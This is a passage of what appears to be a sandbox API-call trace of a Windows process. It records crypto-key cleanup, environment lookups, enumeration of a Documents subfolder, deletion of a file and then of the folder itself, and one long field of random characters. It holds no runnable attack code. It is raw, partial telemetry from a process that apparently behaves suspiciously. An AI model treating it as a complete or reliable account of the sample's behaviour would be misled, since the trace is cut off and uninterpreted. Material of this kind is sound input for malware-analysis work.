pdwDataLen=0x8cef60*=0x8) returned 1 [0222.291] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.291] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.291] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.291] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.291] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.291] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.291] WriteFile (in: hFile=0x4dc, lpBuffer=0x2a71ea8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71ea8*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0222.292] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0222.292] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0222.292] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.292] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.292] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0222.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab9b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0222.292] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0222.292] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.292] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.292] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.292] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.292] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.292] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.292] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.293] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.293] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.293] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.294] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.295] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.295] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.295] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.295] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0222.295] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0222.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0222.295] CryptReleaseContext (hProv=0xa7ba28, dwFlags=0x0) returned 1 [0222.295] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.295] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.295] FreeLibrary (hLibModule=0x76390000) returned 1 [0222.295] CloseHandle (hObject=0x4dc) returned 1 [0222.296] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.296] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.296] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/zxF6sHlM0JaF", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\zxF6sHlM0JaF", lpFilePart=0x8cedf4*="zxF6sHlM0JaF") returned 0x26 [0222.296] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\zxF6sHlM0JaF" (normalized: "c:\\users\\fd1hvy\\documents\\zxf6shlm0jaf")) returned 0x10 [0222.296] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\zxF6sHlM0JaF\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x282d2360, ftCreationTime.dwHighDateTime=0x1d5d750, ftLastAccessTime.dwLowDateTime=0xa72068e0, ftLastAccessTime.dwHighDateTime=0x1d5ca93, ftLastWriteTime.dwLowDateTime=0xa72068e0, ftLastWriteTime.dwHighDateTime=0x1d5ca93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1db8 [0222.296] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x282d2360, ftCreationTime.dwHighDateTime=0x1d5d750, ftLastAccessTime.dwLowDateTime=0xa72068e0, ftLastAccessTime.dwHighDateTime=0x1d5ca93, ftLastWriteTime.dwLowDateTime=0xa72068e0, ftLastWriteTime.dwHighDateTime=0x1d5ca93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0222.296] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x673f0d50, ftCreationTime.dwHighDateTime=0x1d5cbcc, ftLastAccessTime.dwLowDateTime=0xe3c2d3c0, ftLastAccessTime.dwHighDateTime=0x1d5cc94, ftLastWriteTime.dwLowDateTime=0xe3c2d3c0, ftLastWriteTime.dwHighDateTime=0x1d5cc94, nFileSizeHigh=0x0, nFileSizeLow=0x4836, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="jqlBcqbCVMecNTMzc31.ots", cAlternateFileName="JQLBCQ~1.OTS")) returned 1 [0222.296] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\zxF6sHlM0JaF\\jqlBcqbCVMecNTMzc31.ots" (normalized: "c:\\users\\fd1hvy\\documents\\zxf6shlm0jaf\\jqlbcqbcvmecntmzc31.ots")) returned 1 [0222.474] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x673f0d50, ftCreationTime.dwHighDateTime=0x1d5cbcc, ftLastAccessTime.dwLowDateTime=0xe3c2d3c0, ftLastAccessTime.dwHighDateTime=0x1d5cc94, ftLastWriteTime.dwLowDateTime=0xe3c2d3c0, ftLastWriteTime.dwHighDateTime=0x1d5cc94, nFileSizeHigh=0x0, nFileSizeLow=0x4836, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="jqlBcqbCVMecNTMzc31.ots", cAlternateFileName="JQLBCQ~1.OTS")) returned 0 [0222.474] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0222.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854c68 | out: hHeap=0x2af0000) returned 1 [0222.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0222.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0222.476] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0222.503] TranslateMessage (lpMsg=0x8cf968) returned 0 [0222.503] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0222.503] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0222.503] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0222.503] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0222.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0222.511] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0222.511] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0222.512] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae40 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0222.512] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.512] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0222.512] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38545d8 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0222.513] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0222.513] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e) returned 0x29eace8 [0222.513] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/zxF6sHlM0JaF", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\zxF6sHlM0JaF", lpFilePart=0x8cf650*="zxF6sHlM0JaF") returned 0x26 [0222.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eace8 | out: hHeap=0x2af0000) returned 1 [0222.514] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\zxF6sHlM0JaF" (normalized: "c:\\users\\fd1hvy\\documents\\zxf6shlm0jaf")) returned 0x10 [0222.514] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\zxF6sHlM0JaF", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\zxF6sHlM0JaF", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 